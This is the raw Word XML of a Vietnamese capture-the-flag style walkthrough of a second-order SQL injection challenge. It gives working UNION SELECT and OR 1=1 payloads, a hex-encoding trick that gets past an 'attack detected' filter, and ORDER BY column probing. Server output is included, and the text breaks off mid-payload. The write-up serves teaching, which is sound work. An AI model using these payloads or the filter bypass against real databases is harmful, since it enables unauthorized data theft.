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D8F7" w14:textId="54E55F89" w:rsidR="002F49FE" w:rsidRPr="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Source code demo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0940D" w14:textId="726C9714" w:rsidR="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AECCABC" w14:textId="77777777" w:rsidR="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171C9084" w14:textId="7148926C" w:rsidR="00D6575A" w:rsidRPr="00D6575A" w:rsidRDefault="00D6575A" w:rsidP="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/1543927593823-NQZ7ABJ1NEJPGZJ36ZNE/0.png?format=1500w" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0826334C" wp14:editId="3C8A9A0A">
            <wp:extent cx="7252196" cy="675095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78942" cy="6775850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E164FE0" w14:textId="792A5A7F" w:rsidR="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DEAFEC" w14:textId="420FDF41" w:rsidR="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F49761" w14:textId="7E8EF098" w:rsidR="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6575A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Điều kì diệu là đầu ra của câu truy vấn thứ 1 lại là đầu vào của của câu truy vấn thứ 2. Để khai thác lỗi sql injection, ta phải kiểm soát đầu vào của câu truy vấn thứ 2 – biến sec-code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0F1A7" w14:textId="3B336604" w:rsidR="00D6575A" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDD72D5" w14:textId="324EBCE4" w:rsidR="00D6575A" w:rsidRPr="00213BB6" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau khi đã hiểu dc bản chất, chúng ta sẽ bắt đầu khai thác .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1443B" w14:textId="58935743" w:rsidR="00D6575A" w:rsidRPr="00213BB6" w:rsidRDefault="00D6575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2787784A" w14:textId="7AB556F4" w:rsidR="00D6575A" w:rsidRPr="00213BB6" w:rsidRDefault="00AB5510">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Bài này dính lỗi sql injection ở  phần tìm kiếm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708CD0A7" w14:textId="7F7DA29D" w:rsidR="00AB5510" w:rsidRPr="00213BB6" w:rsidRDefault="00AB5510">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041E200" w14:textId="04590C08" w:rsidR="00AB5510" w:rsidRPr="00213BB6" w:rsidRDefault="00AB5510" w:rsidP="00AB5510">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB5510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161EA20" w14:textId="10D9ED8B" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00AB5510">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Câu truy vấn : select user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from users where </w:t>
      </w:r>
      <w:r w:rsidR="0073731E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user=’admin’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DC07A" w14:textId="23217214" w:rsidR="00AB5510" w:rsidRPr="00213BB6" w:rsidRDefault="00AB5510" w:rsidP="00AB5510">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5522352B" w14:textId="5B40872A" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00AB5510">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Thử khai thác bằng UNION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E3664" w14:textId="07F308A8" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00AB5510">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Login=admin</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFABC6" w14:textId="77777777" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00213BB6">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&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D8EBD" w14:textId="77777777" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00213BB6">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 Found ID: 3&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28819EDA" w14:textId="745F89B7" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00213BB6">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 xml:space="preserve">[+] Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00213BB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>admin@sqli_me.com&lt;br</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033253F" w14:textId="240F2E49" w:rsidR="00213BB6" w:rsidRPr="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00213BB6">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t>Rõ ràng chỉ truy suất được username thoi nhưng tại sao lại có id,email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F5FFD" w14:textId="3A91D9CD" w:rsidR="00213BB6" w:rsidRDefault="00213BB6" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00213BB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql injection routed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085D5BDA" w14:textId="00996D87" w:rsidR="0073731E" w:rsidRDefault="0073731E" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190B716B" w14:textId="3570511D" w:rsidR="0073731E" w:rsidRDefault="0073731E"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Kết quả câu truy vấn thứ 1 là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4963C" w14:textId="76C1B48C" w:rsidR="0073731E" w:rsidRDefault="0073731E"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Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346777AA" w14:textId="046EF88F" w:rsidR="0073731E" w:rsidRDefault="0073731E"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null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601F9A6" w14:textId="74D33D27" w:rsidR="0073731E" w:rsidRDefault="0073731E" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DDF7ED" w14:textId="6DB1D411" w:rsidR="0073731E" w:rsidRDefault="0073731E"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Mình đoán câu truy vấn 2 sẽ là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21904D" w14:textId="5FFB272A" w:rsidR="0073731E" w:rsidRDefault="0073731E"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Select user_id,email from users where user=’admin’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D431E5" w14:textId="54C8973C" w:rsidR="004B344D" w:rsidRDefault="004B344D" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5EAE97" w14:textId="05790B79" w:rsidR="005C0990" w:rsidRDefault="005C099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Nếu mình đưa đk đúng  vào câu truy vấn 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF41F13" w14:textId="4BE18E13" w:rsidR="005C0990" w:rsidRDefault="005C099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Login=’</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">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UNION</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">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SELECT</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">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OR 1=1#)</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">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14:paraId="292F5EB4" w14:textId="786F4B19" w:rsidR="005C0990" w:rsidRDefault="005C099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Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A0FA63" w14:textId="3D9E3AD2" w:rsidR="005C0990" w:rsidRDefault="005C099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NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43683F" w14:textId="4C4BDE6D" w:rsidR="005C0990" w:rsidRDefault="005C099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OR 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A0CFF8" w14:textId="74A9AD3B" w:rsidR="005C0990" w:rsidRDefault="005C099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-&gt;Câu truy vấn 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9D69C" w14:textId="7497BB90" w:rsidR="005C0990" w:rsidRDefault="005C0990" w:rsidP="005C099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Select user_id,email from users where user=’’ OR 1=1 #’</w:t>
      </w:r>
      <w:r w:rsidRPr="005C0990">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="005C0990">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liệt kê đc hết các dòng trong csdl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB009B" w14:textId="73136EB3" w:rsidR="005C0990" w:rsidRDefault="005C0990" w:rsidP="005C099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Nhưng xui quá: </w:t>
      </w:r>
      <w:r w:rsidR="00815E11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">attack detected </w:t>
      </w:r>
      <w:r w:rsidR="00815E11" w:rsidRPr="00815E11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8AB659" w14:textId="23824EC6" w:rsidR="00815E11" w:rsidRDefault="00815E11" w:rsidP="005C0990">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4C9BC6" w14:textId="2D5B90BB" w:rsidR="00815E11" w:rsidRDefault="00815E11" w:rsidP="00815E1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Mình sẽ mã hóa HEX: ‘ OR 1=1#   </w:t>
      </w:r>
      <w:r w:rsidRPr="00815E11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00815E11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x27206f7220313d3123</w:t>
      </w:r>
      <w:r w:rsidR="000E0740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (không có dấu +)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914BE9F" w14:textId="6F00C182" w:rsidR="00815E11" w:rsidRDefault="00815E11" w:rsidP="005C0990">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C679896" w14:textId="5EFCBBDC" w:rsidR="005C0990" w:rsidRDefault="00815E11"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Login: </w:t>
      </w:r>
      <w:r w:rsidRPr="00815E11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+0x27206f7220313d3123#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BFC542" w14:textId="0658078A" w:rsidR="00815E11" w:rsidRDefault="00815E11"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Kết quả: tìm thấy user cuối cùng có id là 3 (thành công). Nhưng quan trọng hơn , chúng ta đã tìm dc cách bypass filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A25DDFF" w14:textId="2D2BBD55" w:rsidR="000E0740" w:rsidRDefault="000E074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(Lưu ý : câu truy vấn 1 mã hóa url nên có dấu +)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD43A3" w14:textId="4C18A88B" w:rsidR="000E0740" w:rsidRDefault="000E0740" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6906BEA6" w14:textId="506CBFCA" w:rsidR="000E0740" w:rsidRDefault="000E0740"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Tiếp theo, ta xác định số cột của câu truy vấn 2 bằng order by.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77068D03" w14:textId="6B31F829" w:rsidR="000E0740" w:rsidRDefault="006543E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Login: ‘+UNION+SELECT+(‘ ORDER BY 3#)+#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF06EC" w14:textId="59D7AF94" w:rsidR="006543EC" w:rsidRDefault="006543E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Mã hóa hex: ‘ ORDER BY 3# </w:t>
      </w:r>
      <w:r w:rsidRPr="006543EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006543EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x27204f52444552204259203323</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42779596" w14:textId="3CAD4663" w:rsidR="006543EC" w:rsidRDefault="006543E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Kết quả: </w:t>
      </w:r>
      <w:r w:rsidR="00AE386C" w:rsidRPr="00AE386C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unknown column '3' in 'order clause'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E721316" w14:textId="59532C00" w:rsidR="00AE386C" w:rsidRDefault="00AE386C" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CBE340" w14:textId="57055E94" w:rsidR="00AE386C" w:rsidRDefault="00AE386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Lỗi này là 1 tin tốt vì kết quả chúng ta nhận dc chỉ có id và email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A4669" w14:textId="3F304ED4" w:rsidR="00AE386C" w:rsidRDefault="00AE386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Tiêm union select để truy suất dữ liệu khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4CFC59" w14:textId="1379BA4D" w:rsidR="00AE386C" w:rsidRDefault="00AE386C" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43618CB7" w14:textId="10602086" w:rsidR="00AE386C" w:rsidRDefault="00AE386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Login: ‘+UNION+SELECT+(‘ UNION SELECT 1,2#) #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECD8E4" w14:textId="3B478FB9" w:rsidR="00AE386C" w:rsidRDefault="00AE386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(không có dấu ngoặc nha)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2975C" w14:textId="60A21E60" w:rsidR="00AE386C" w:rsidRDefault="00AE386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Mã hóa hex:  ‘ UNION SELECT 1,2# </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE386C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE386C">
